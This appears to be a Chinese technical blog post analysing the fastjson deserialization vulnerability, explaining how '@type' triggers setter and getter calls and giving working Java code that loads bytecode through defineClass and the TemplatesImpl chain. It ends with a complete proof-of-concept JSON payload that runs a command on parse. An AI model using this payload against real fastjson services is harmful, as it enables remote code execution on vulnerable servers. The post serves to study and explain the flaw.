fastjson分析

1.fastjson简单使用

User:

packagecom.naihe;publicclassUser{privateString name;privateintage;publicUser(){}publicUser(String name,intage){this.name=name;this.age=age;}publicStringgetName(){returnname;}publicvoidsetName(String name){this.name=name;}publicintgetAge(){returnage;}publicvoidsetAge(intage){this.age=age;}}

Demo:

packagecom.naihe;importcom.alibaba.fastjson.JSONObject;importcom.alibaba.fastjson.serializer.SerializerFeature;publicclassFS{publicstaticvoidmain(String[]args){User user1=newUser("小李",10);String JsStr1=JSONObject.toJSONString(user1);System.out.println(JsStr1);User user2=newUser("大李",100);String JsStr2=JSONObject.toJSONString(user2,SerializerFeature.WriteClassName);System.out.println(JsStr2);String str="{\"@type\":\"com.naihe.User\",\"age\":1000,\"name\":\"老李\"}";Object obj1=JSONObject.parse(str);System.out.println(obj1);Object obj2=JSONObject.parseObject(str);System.out.println(obj2);}}

2.反序列化漏洞分析

由于fastjson调试起来过程比较复杂,在这里直接看关键点:

首先会获取字符串的第一对引号中的内容

如果内容为@type就会加载下一对引号中的类

在JavaBeanInfo.class中会获取类中所有详细详细

在这里匹配以set开头的方法

这里判断函数名长度大于4,且以set开头,非静态函数,返回类型为void或当前类参数个数为1个的方法

methodName.length()>=4&&!Modifier.isStatic(method.getModifiers())&&(method.getReturnType().equals(Void.TYPE)||method.getReturnType().equals(method.getDeclaringClass())))

函数名长度大于等于4非静态方法,以get开头且第4个字母为大写,无参数,返回值类型继承自Collection或Map或AtomicBoolean,或Atomiclnteger或AtomicLon的方法

methodName.length()>=4&&!Modifier.isStatic(method.getModifiers())&&methodName.startsWith("get")&&Character.isUpperCase(methodName.charAt(3))&&method.getParameterTypes().length==0&&(Collection.class.isAssignableFrom(method.getReturnType())||Map.class.isAssignableFrom(method.getReturnType())||AtomicBoolean.class==method.getReturnType()||AtomicInteger.class==method.getReturnType()||AtomicLong.class==method.getReturnType()))

其实本质就是fastjson会利用反序列化通过无参构造创建一个对象,不通过setter或getter方法进行赋值与输出操作

因此我们只需要找到满足条件的类就行,这里一般利用的是 TemplatesImpl链来加载字节码,从而rce等操作

下面我们来证明一下我们的观点

在setter方法中添加一段命令执行的代码

packagecom.naihe;publicclassUser{privateString name;privateintage;publicUser(){}publicUser(String name,intage){this.name=name;this.age=age;}publicStringgetName(){returnname;}publicvoidsetName(String name){this.name=name;Runtime.getRuntime().exec("clac");}publicintgetAge(){returnage;}publicvoidsetAge(intage){this.age=age;}}

Demo:

packagecom.naihe;importcom.alibaba.fastjson.JSONObject;publicclassDemo1{publicstaticvoidmain(String[]args){String str="{\"@type\":\"com.naihe.User\",\"age\":1000,\"name\":\"老李\"}";Object obj1=JSONObject.parse(str);}}

3.字节码加载

1.利用defineClass加载字节码

packagecom.naihe;importjavassist.CannotCompileException;importjavassist.ClassPool;importjavassist.CtClass;importjavassist.NotFoundException;importjava.io.IOException;importjava.lang.reflect.InvocationTargetException;importjava.lang.reflect.Method;publicclassDC{publicstaticvoidmain(String[]args)throwsInvocationTargetException,IllegalAccessException,NoSuchMethodException,InstantiationException,NotFoundException,CannotCompileException,IOException{//通过字节码构建恶意类ClassPool classPool=ClassPool.getDefault();String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";classPool.appendClassPath(AbstractTranslet);CtClass payload=classPool.makeClass("CommonsCollections3");payload.setSuperclass(classPool.get(AbstractTranslet));payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");byte[]code=payload.toBytecode();Method defineClass=ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);defineClass.setAccessible(true);Classyyds=(Class)defineClass.invoke(ClassLoader.getSystemClassLoader(),"CommonsCollections3",code,0,code.length);yyds.newInstance();}}

2.利用TemplatesImpl加载字节码

packagecom.naihe;importcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;importcom.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;importjavassist.ClassPool;importjavassist.CtClass;importjava.lang.reflect.Field;importjava.util.Base64;publicclassTL{privatestaticvoidsetFiledValue(Object obj,String fieldName,Object fieldValue)throwsException{Field field=obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj,fieldValue);}publicstaticvoidmain(String[]args){try{ClassPool classPool=ClassPool.getDefault();String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";classPool.appendClassPath(AbstractTranslet);CtClass payload=classPool.makeClass("CommonsCollections3");payload.setSuperclass(classPool.get(AbstractTranslet));payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");byte[]codes=payload.toBytecode();byte[][]_bytecodes=newbyte[][]{codes,};TemplatesImpl templates=newTemplatesImpl();setFiledValue(templates,"_bytecodes",_bytecodes);setFiledValue(templates,"_name","whatever");setFiledValue(templates,"_tfactory",newTransformerFactoryImpl());templates.newTransformer();}catch(Exceptione){e.printStackTrace();}}}

poc:

packagecom.naihe;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.parser.Feature;importcom.alibaba.fastjson.parser.ParserConfig;importjavassist.CannotCompileException;importjavassist.ClassPool;importjavassist.CtClass;importjavassist.NotFoundException;importjava.io.IOException;importjava.util.Base64;publicclassfastjson{publicstaticvoidmain(String[]args)throwsCannotCompileException,IOException,NotFoundException{ParserConfig config=newParserConfig();ClassPool classPool=ClassPool.getDefault();String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";classPool.appendClassPath(AbstractTranslet);CtClass payload=classPool.makeClass("CommonsCollections3");payload.setSuperclass(classPool.get(AbstractTranslet));payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");String str=Base64.getEncoder().encodeToString(payload.toBytecode());String text="{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""+str+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }}";Object obj=JSON.parseObject(text,Object.class,config,Feature.SupportNonPublicField);}}

3.利用分析

fastjosn一般是使用TemplatesImpl链来进行攻击的,在上面其实已经分析过fastjson在反序列化的时候会调用满足条件的getter方法,因此就会调用TemplatesImpl类的getOutputProperties方法,然后通过getOutputProperties,调用newTransformer

仔细观察就会发现poc中将byte进行了base64加密,那么这是为什么了?

在调用deserialze时会执行base64解密

造成_bytecodes需要进行base64编码

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,569评论 4 363
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,499评论 1 294
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,271评论 0 244
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,087评论 0 209
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,474评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,670评论 1 222
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,911评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,636评论 0 202
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,397评论 1 246
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,607评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,093评论 1 261
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,418评论 2 254
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,074评论 3 237
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,092评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,865评论 0 196
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,726评论 2 276
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,627评论 2 270

推荐阅读更多精彩内容